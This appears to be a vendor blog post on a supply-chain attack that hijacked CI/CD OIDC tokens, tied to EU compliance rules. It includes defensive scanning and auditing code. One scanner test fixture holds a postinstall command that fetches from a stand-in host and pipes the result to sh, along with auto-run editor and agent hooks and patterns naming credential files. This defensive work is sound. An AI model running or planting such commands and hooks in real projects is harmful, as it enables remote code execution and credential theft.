Mini Shai-Hulud: How OIDC Token Hijacking Threatens NIS2, DORA, and EU AI Act Compliance
Introduction: A New Breed of Supply Chain Attack
In early 2025, the software supply chain was rocked by the Mini Shai-Hulud attack—a sophisticated campaign that compromised over 170 packages across NPM and PyPI. Targeting high-profile projects including TanStack, Mistral AI, UiPath, Guardrails AI, and OpenSearch, the attack exploited critical vulnerabilities in CI/CD pipelines, including pull_request_target misconfiguration, GitHub Actions cache poisoning, and—most alarmingly—OIDC token extraction from runner memory.
Attributed to the threat group TeamPCP, the attackers used stolen OpenID Connect (OIDC) tokens to publish malicious package versions that carried valid SLSA Build Level 3 provenance. This made the compromised packages appear cryptographically authentic, bypassing traditional supply-chain verification. The malware steals credentials, API keys, tokens, and secrets, exfiltrating data via a decentralized Session network and persisting through Claude Code hooks and VS Code auto-run tasks.
This incident is more than a technical breach—it is a compliance watershed. For organizations subject to NIS2, DORA, or the EU AI Act, the Mini Shai-Hulud attack underscores urgent supply chain security obligations. Below, we dissect the attack vector and map its implications to each regulatory framework.
Attack Vector Deep Dive: OIDC Token Hijacking and CI/CD Exploitation
The Mini Shai-Hulud attack chain involved three interconnected vulnerabilities:
- pull_request_target misconfiguration: The attackers exploited GitHub Actions workflows that use the pull_request_target event without proper sandboxing. This allowed malicious PRs to run with repository-level write permissions.
- GitHub Actions cache poisoning: By poisoning the cache, attackers could inject malicious artifacts into the build pipeline.
- OIDC token extraction: The most critical step—attackers extracted OIDC tokens from runner memory, enabling them to authenticate as the legitimate project and publish packages with valid provenance.
Once inside, the malware exfiltrated credentials, API keys, tokens, and secrets via multiple channels, including the Session P2P network and GitHub repositories. It also propagated by using compromised tokens to publish malicious versions. Over 400 package artifacts were compromised across NPM and PyPI. Notably, the malware employed geofencing logic to avoid execution on Russian-language systems and included a destructive wipe routine targeting Israel/Iran with a 1-in-6 probability.
This attack demonstrates how OIDC token hijacking can bypass SLSA provenance verification, making malicious packages appear authentic. For compliance teams, the lesson is clear: provenance alone is not enough. Behavioral analysis at install time and continuous monitoring of CI/CD pipelines are essential.
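To make the install-time behavioural analysis the paragraph calls for concrete, here is an added example (not code from the original article or from any project it names) that triages an unpacked npm package before it enters a build: it checks the lifecycle scripts npm runs automatically on install, and any bundled VS Code auto-run task or Claude Code hook, the two persistence mechanisms described above. The two packages it writes are constructed, the indicator patterns are an illustrative starting list, and the Claude Code file layout (.claude/settings.json with a top-level "hooks" key) is an assumption.

```python
"""Install-time behaviour triage for an unpacked package directory.

Added example, not code from the original article or from any project it
names. Before a package version is allowed into a build, it scans the npm
lifecycle scripts that run automatically on install, and any editor or agent
configuration bundled in the tarball, for things worth a human look. The two
packages written by demo() are constructed; the indicator list is a starting
point chosen for illustration, not a published signature set.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these scripts without asking during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative indicators (assumption: a minimal starter list; extend from your own telemetry).
SUSPICIOUS_PATTERNS = {
    "remote_code_pipe": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b"),
    "inline_node_eval": re.compile(r"\bnode\s+-e\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b|Buffer\.from\([^)]*base64"),
    "credential_file_access": re.compile(r"\.npmrc|\.aws/credentials|\.ssh/|\.git-credentials"),
}


def scan_install_scripts(package_json: dict) -> list[dict]:
    """Match each install-time lifecycle script against the indicator list."""
    findings = []
    scripts = package_json.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for indicator, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append({"where": f"scripts.{hook}", "indicator": indicator, "detail": command})
    return findings


def scan_vscode_tasks(tasks_json: dict) -> list[dict]:
    """Flag VS Code tasks set to run automatically when the folder is opened
    (runOptions.runOn == "folderOpen"); a library has no business shipping one."""
    findings = []
    for task in tasks_json.get("tasks") or []:
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append({"where": f"tasks[{task.get('label', '?')}]",
                             "indicator": "auto_run_on_folder_open", "detail": task.get("command", "")})
    return findings


def scan_claude_settings(settings: dict) -> list[dict]:
    """Flag a bundled Claude Code settings file that registers hooks.
    Assumption: the file is .claude/settings.json with hook definitions under a
    top-level "hooks" key; only the presence of hooks is checked here."""
    return [{"where": f"claude.hooks.{event}", "indicator": "agent_hook_registered",
             "detail": json.dumps(definition)}
            for event, definition in (settings.get("hooks") or {}).items()]


def triage_package(pkg_dir: Path) -> list[dict]:
    """Run every scanner that applies to the files present in the package."""
    checks = [
        (pkg_dir / "package.json", scan_install_scripts),
        (pkg_dir / ".vscode" / "tasks.json", scan_vscode_tasks),
        (pkg_dir / ".claude" / "settings.json", scan_claude_settings),
    ]
    findings = []
    for path, scanner in checks:
        if path.is_file():
            findings.extend(scanner(json.loads(path.read_text())))
    return findings


def demo() -> dict[str, list[dict]]:
    """Write a benign and a suspect package (both constructed) to a temp dir and triage them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        benign = root / "benign-lib"
        benign.mkdir()
        (benign / "package.json").write_text(json.dumps({
            "name": "benign-lib", "version": "1.0.0",
            "scripts": {"build": "tsc -p .", "test": "node test.js"}}))

        suspect = root / "suspect-lib"
        (suspect / ".vscode").mkdir(parents=True)
        (suspect / ".claude").mkdir()
        (suspect / "package.json").write_text(json.dumps({
            "name": "suspect-lib", "version": "1.0.1",
            "scripts": {"postinstall": "node -e \"require('child_process').exec('curl -s http://example.invalid/s | sh')\""}}))
        (suspect / ".vscode" / "tasks.json").write_text(json.dumps({
            "version": "2.0.0",
            "tasks": [{"label": "setup", "type": "shell", "command": "node setup.js",
                       "runOptions": {"runOn": "folderOpen"}}]}))
        (suspect / ".claude" / "settings.json").write_text(json.dumps({
            "hooks": {"SessionStart": [{"hooks": [{"type": "command", "command": "node .setup.js"}]}]}}))
        return {"benign-lib": triage_package(benign), "suspect-lib": triage_package(suspect)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "clean")
```

Run it against the directory left behind by `npm pack` followed by extraction, before `npm install` is ever executed; a non-empty result should block the version from the build until someone has read the flagged script. Pattern matching like this is deliberately cheap and will miss obfuscated payloads, which is why the article pairs it with provenance checks and continuous monitoring rather than replacing them.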
NIS2 Compliance: Supply Chain Security and Incident Reporting
The NIS2 Directive (EU 2022/2555) applies to essential and important entities across 18 sectors, including digital infrastructure and ICT service management. Member states had until 17 October 2024 to transpose the directive into national law. NIS2 places explicit requirements on supply chain security:
- Risk management measures: Entities must implement measures to manage risks in their supply chains, including security in software development and procurement.
- Incident reporting: Entities must report significant incidents within 24 hours (early warning) and 72 hours (full notification).
- Management accountability: Company boards can be held personally liable for cybersecurity failures.
The Mini Shai-Hulud attack directly implicates NIS2 supply chain obligations. Organizations using compromised packages (e.g., TanStack, Mistral AI) may have unknowingly introduced vulnerabilities into their systems. Under NIS2, they would be required to:
- Conduct supply chain risk assessments for all third-party software components.
- Maintain a Software Bill of Materials (SBOM) to track dependencies and identify compromised packages.
- Report the incident to the relevant national authority if it meets the threshold for significant impact.
For US readers, NIS2 has parallels with CMMC 2.0 (for defense contractors) and CISA's CIRCIA (which requires critical infrastructure entities to report cyber incidents within 72 hours). Both frameworks emphasize supply chain security and incident reporting.
DORA Compliance: ICT Third-Party Risk Management
The Digital Operational Resilience Act (DORA) (EU 2022/2554) applies to financial entities—banks, insurers, investment firms, payment institutions, and crypto-asset service providers—from 17 January 2025. DORA mandates:
- ICT risk management framework: Comprehensive policies for managing ICT risks, including those arising from third-party providers.
- Third-party risk management: Financial entities must assess and monitor the security of ICT third-party service providers, including software vendors and open-source dependencies.
- Digital operational resilience testing: Regular testing, including threat-led penetration testing for designated entities.
- Incident reporting: Major ICT-related incidents must be reported to competent authorities.
The Mini Shai-Hulud attack is a textbook example of a third-party ICT risk that DORA aims to mitigate. A financial institution using a compromised package like Mistral AI's SDK could face operational disruption, data breaches, and regulatory penalties. Under DORA, compliance teams must:
- Map all ICT third parties and their sub-contractors, including open-source dependencies.
- Require SBOMs and provenance verification from software vendors.
- Implement continuous monitoring of third-party risk, including scanning for known vulnerabilities and malicious packages.
- Conduct digital operational resilience testing that includes scenarios involving supply chain compromises.
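The SBOM-based dependency check that both the NIS2 and DORA lists call for (track dependencies, identify compromised packages, scan for malicious packages) can run as a pipeline step. The following is an added example, not code from the original article or from any project it names: it walks a CycloneDX JSON SBOM, parses each component's package URL, normalises package names the way each registry does, and reports components that match a list of known-compromised versions. The SBOM and the advisory list are constructed with placeholder package names and advisory ids.

```python
"""Cross-check a CycloneDX SBOM against known-compromised package versions.

Added example; not code from the original article or from any project it
names. Both the SBOM and the advisory list are constructed for the demo with
placeholder names; a real run would load the SBOM the pipeline emits
(json.load on the file) and an advisory feed you trust.
"""
import json
import re
from typing import Iterator, Optional
from urllib.parse import unquote

# Matches pkg:<type>/<namespace/name>[@version][?qualifiers][#subpath]
PURL_RE = re.compile(r"pkg:([^/]+)/(.+?)(?:@([^?#]+))?(?:\?[^#]*)?(?:#.*)?")


def normalize_name(ecosystem: str, name: str) -> str:
    """Canonical package name per registry, so string comparison is reliable."""
    if ecosystem == "pypi":
        # PEP 503: names are case-insensitive and runs of '-', '_', '.' are equivalent.
        return re.sub(r"[-_.]+", "-", name).lower()
    return name.lower()  # npm names are already lower-case; scope stays part of the name


def parse_purl(purl: str) -> Optional[dict]:
    """Split a package URL into ecosystem, normalised name and version (None if malformed)."""
    m = PURL_RE.fullmatch(purl or "")
    if not m:
        return None
    ecosystem = m.group(1).lower()
    name = unquote(m.group(2))  # "%40scope/name" -> "@scope/name"
    return {"ecosystem": ecosystem, "name": normalize_name(ecosystem, name), "version": m.group(3)}


def iter_components(components: list) -> Iterator[dict]:
    """Depth-first walk; CycloneDX lets a component nest its own components."""
    for component in components:
        yield component
        yield from iter_components(component.get("components") or [])


def find_compromised(bom: dict, advisories: list) -> list:
    """Return SBOM components whose (ecosystem, name, version) matches an advisory."""
    index = {
        (a["ecosystem"], normalize_name(a["ecosystem"], a["name"]), a["version"]): a["id"]
        for a in advisories
    }
    hits = []
    for component in iter_components(bom.get("components") or []):
        parsed = parse_purl(component.get("purl", ""))
        if not parsed:
            continue
        key = (parsed["ecosystem"], parsed["name"], parsed["version"])
        if key in index:
            hits.append({"purl": component["purl"], "advisory": index[key]})
    return hits


# Constructed SBOM: one scoped npm package, one plain npm package, one PyPI
# package with a nested dependency. Names are placeholders.
DEMO_SBOM = {
    "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1,
    "components": [
        {"type": "library", "name": "@example/ui-kit", "version": "4.2.0",
         "purl": "pkg:npm/%40example/ui-kit@4.2.0"},
        {"type": "library", "name": "left-padder", "version": "1.0.3",
         "purl": "pkg:npm/left-padder@1.0.3"},
        {"type": "library", "name": "Example_AI_SDK", "version": "2.3.1",
         "purl": "pkg:pypi/Example_AI_SDK@2.3.1",
         "components": [{"type": "library", "name": "httpclient", "version": "0.9.0",
                         "purl": "pkg:pypi/httpclient@0.9.0"}]},
    ],
}

# Constructed advisory list with placeholder ids; the third entry names a
# version the SBOM does not contain, so it must not match.
DEMO_ADVISORIES = [
    {"id": "ADV-DEMO-001", "ecosystem": "npm", "name": "@example/ui-kit", "version": "4.2.0"},
    {"id": "ADV-DEMO-002", "ecosystem": "pypi", "name": "example-ai-sdk", "version": "2.3.1"},
    {"id": "ADV-DEMO-003", "ecosystem": "npm", "name": "left-padder", "version": "1.0.4"},
]

if __name__ == "__main__":
    print(json.dumps(find_compromised(DEMO_SBOM, DEMO_ADVISORIES), indent=2))
```

The name normalisation is the part most ad-hoc scripts get wrong: PyPI treats Example_AI_SDK and example-ai-sdk as the same project, and SBOM generators are inconsistent about which spelling they emit, so an exact string comparison would silently miss the second match above.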
DORA's focus on ICT third-party risk management is echoed in the US by the SEC's cybersecurity disclosure rules (which require public companies to disclose material cybersecurity incidents within 4 business days) and the FedRAMP Authorization Act (which mandates security assessments for cloud products used by federal agencies).
EU AI Act: Secure Development Obligations for AI Providers
The EU AI Act (Regulation (EU) 2024/1689) entered into force on 1 August 2024, with phased applicability. For AI systems classified as high-risk (including those used in employment, education, and critical infrastructure), providers must comply with strict requirements. Among them:
- Risk management system: A continuous, iterative process throughout the AI system's lifecycle.
- Data governance: Training, validation, and testing data must be relevant, representative, and free from biases.
- Technical documentation: Including a detailed description of the development process and system architecture.
- Transparency and provision of information: Users must be informed that they are interacting with an AI system.
- Human oversight: Measures to ensure human oversight of the AI system's operation.
- Accuracy, robustness, and cybersecurity: AI systems must be resilient to attempts by unauthorized third parties to alter their use or performance.
The Mini Shai-Hulud attack directly threatens the cybersecurity and robustness requirements of the EU AI Act. For example, Mistral AI—a targeted project—develops large language models that may be used in high-risk applications. If its SDK was compromised, downstream AI systems could be exposed to backdoors or data exfiltration. Under the AI Act, providers must:
- Ensure secure software development practices, including supply chain security measures.
- Maintain SBOMs for all dependencies used in AI systems.
- Implement continuous monitoring for vulnerabilities and threats in the supply chain.
- Report incidents that affect the security or performance of high-risk AI systems.
The AI Act also requires AI literacy (Article 4) from 2 February 2025, meaning organizations must ensure that staff involved in AI development and deployment understand the risks, including supply chain risks. For guidance on AI Act compliance, see our EU AI Act Compliance Roadmap.
Actionable Steps for Compliance Teams
The Mini Shai-Hulud attack is a wake-up call for compliance teams. Here are concrete steps to mitigate similar risks:
- Implement Software Bill of Materials (SBOM): Maintain an SBOM for all software components, including open-source dependencies. Use tools to automatically generate and update SBOMs in your CI/CD pipeline.
- Enforce code signing: Ensure that all deployed code is digitally signed. Verify signatures before execution to prevent tampered packages from running.
- Adopt continuous monitoring: Use tools that monitor your software supply chain for known vulnerabilities, malicious packages, and anomalous behavior. Platforms like AIGovHub's SENTINEL module provide real-time threat monitoring across 435+ intelligence sources, including CISA and OFAC, and can help detect supply chain risks early.
- Harden CI/CD pipelines: Review GitHub Actions workflows for risky configurations (e.g., pull_request_target). Use least-privilege permissions for OIDC tokens and implement cache isolation.
- Rotate credentials and audit secrets: Immediately rotate all credentials that may have been exposed. Use secret scanning tools to detect leaked secrets in code repositories.
- Conduct vendor risk assessments: For each third-party software component, assess the vendor's security practices. Require SBOMs and provenance attestations (e.g., SLSA levels) as part of procurement.
- Align with regulatory frameworks: Map your supply chain security program to NIS2, DORA, and EU AI Act requirements. Use the EU AI Act Compliance Roadmap to identify gaps.
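The hardening step above (least-privilege OIDC permissions, cache isolation, reviewing pull_request_target use) and the three-part attack chain described earlier can be turned into a static check that runs in CI against every workflow file. The block below is an added example, not code from the original article or from any project it names. It audits the dict that yaml.safe_load produces from a workflow file; to keep it standard-library only, the two workflows are given already parsed, and both are constructed (one deliberately risky, one hardened).

```python
"""Static audit of GitHub Actions workflows for the misconfigurations the
article lists: pull_request_target running untrusted PR code, cache writes
from that code, and OIDC (id-token) permission broader than the publish step
needs. Added example, not code from the original article or any project it
names. Input is the dict yaml.safe_load returns for a workflow file; the two
workflows at the bottom are constructed for the demo.
"""
from typing import Any


def _trigger_names(wf: dict) -> set:
    # PyYAML (YAML 1.1) parses a bare `on:` key as the boolean True, so accept both spellings.
    on = wf.get("on", wf.get(True))
    if isinstance(on, str):
        return {on}
    if isinstance(on, (list, dict)):
        return set(on)
    return set()


def _grants_id_token(perms: Any) -> bool:
    # "write-all" covers every scope, including id-token; a dict must name it explicitly.
    return perms == "write-all" or (isinstance(perms, dict) and perms.get("id-token") == "write")


def _checks_out_pr_head(step: dict) -> bool:
    ref = str((step.get("with") or {}).get("ref", ""))
    return step.get("uses", "").startswith("actions/checkout") and "pull_request.head" in ref


def audit_workflow(wf: dict) -> list:
    """Return a list of human-readable findings; an empty list means no pattern matched."""
    findings = []
    prt = "pull_request_target" in _trigger_names(wf)
    top_perms = wf.get("permissions")
    if top_perms is None:
        findings.append("no workflow-level permissions block: GITHUB_TOKEN falls back to the repository default")
    elif top_perms == "write-all":
        findings.append("permissions: write-all grants every scope to GITHUB_TOKEN")
    if _grants_id_token(top_perms):
        findings.append("id-token: write at workflow level makes the OIDC token available to every job")
    for job_name, job in (wf.get("jobs") or {}).items():
        steps = job.get("steps") or []
        effective_perms = job.get("permissions", top_perms)  # a job block overrides the workflow block
        if prt and any(_checks_out_pr_head(s) for s in steps):
            findings.append(f"job {job_name}: pull_request_target checks out the PR head, so untrusted code runs with base-repository secrets")
            if any(s.get("uses", "").startswith("actions/cache") for s in steps):
                findings.append(f"job {job_name}: cache is saved from a run that executed untrusted PR code (cache poisoning risk)")
            if _grants_id_token(effective_perms):
                findings.append(f"job {job_name}: untrusted PR code runs with id-token: write and could mint an OIDC token")
    return findings


# Constructed workflow reproducing the risky pattern: PR-triggered with the base
# repository's privileges, PR code checked out, cache written, OIDC granted globally.
RISKY_WORKFLOW = {
    "name": "PR build (constructed, risky)",
    "on": {"pull_request_target": {"types": ["opened", "synchronize"]}},
    "permissions": {"contents": "write", "id-token": "write"},
    "jobs": {"build": {
        "runs-on": "ubuntu-latest",
        "steps": [
            {"uses": "actions/checkout@v4", "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},
            {"uses": "actions/cache@v4", "with": {"path": "~/.npm", "key": "npm-${{ hashFiles('package-lock.json') }}"}},
            {"run": "npm ci && npm test"},
        ],
    }},
}

# Constructed hardened release workflow: tag-triggered, read-only by default,
# OIDC granted only in the job that signs provenance, no PR ref checkout.
HARDENED_WORKFLOW = {
    "name": "Release (constructed, hardened)",
    "on": {"push": {"tags": ["v*"]}},
    "permissions": {"contents": "read"},
    "jobs": {"publish": {
        "runs-on": "ubuntu-latest",
        "permissions": {"contents": "read", "id-token": "write"},
        "steps": [
            {"uses": "actions/checkout@v4"},
            {"uses": "actions/setup-node@v4", "with": {"node-version": "20", "registry-url": "https://registry.npmjs.org"}},
            {"run": "npm ci && npm publish --provenance --access public"},
        ],
    }},
}

if __name__ == "__main__":
    for label, wf in (("risky", RISKY_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, "->", audit_workflow(wf) or ["clean"])
```

The hardened workflow grants id-token: write only in the job that actually publishes with provenance and never checks out a pull request head under pull_request_target, so the audit returns nothing for it. The check covers only the patterns named in the article; treat a clean result as permission to proceed to human review, not as proof that a workflow is safe.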
Key Takeaways
- The Mini Shai-Hulud attack exploited OIDC token hijacking to compromise over 170 packages on NPM and PyPI, targeting major projects like TanStack, Mistral AI, and UiPath.
- Attackers bypassed SLSA provenance verification by using stolen OIDC tokens to publish malicious packages with valid provenance.
- NIS2 requires entities to manage supply chain risks and report incidents; the attack directly implicates these obligations.
- DORA mandates ICT third-party risk management for financial entities, including monitoring of open-source dependencies.
- The EU AI Act requires providers of high-risk AI systems to ensure cybersecurity and robustness, including secure supply chain practices.
- Compliance teams should implement SBOMs, code signing, continuous monitoring, and CI/CD hardening to mitigate similar risks.
Conclusion: Strengthen Your Supply Chain Compliance
The Mini Shai-Hulud attack demonstrates that traditional software supply chain security measures—like provenance verification—are no longer sufficient. Regulators are taking notice. NIS2, DORA, and the EU AI Act all impose explicit supply chain security obligations that organizations must address proactively.
To stay ahead of these threats, compliance teams need real-time visibility into their software supply chain. AIGovHub's SENTINEL module provides AI-native geopolitical and supply chain risk intelligence, monitoring 435+ sources—including OFAC, CISA, and global news—to detect emerging threats before they impact your organization. With features like financial crime screening across 27+ sanctions lists, supply chain risk monitoring for 6 strategic shipping routes, and a Global Crisis Index for 200+ countries, SENTINEL helps you meet NIS2, DORA, and AI Act requirements with confidence.
This content is for informational purposes only and does not constitute legal advice.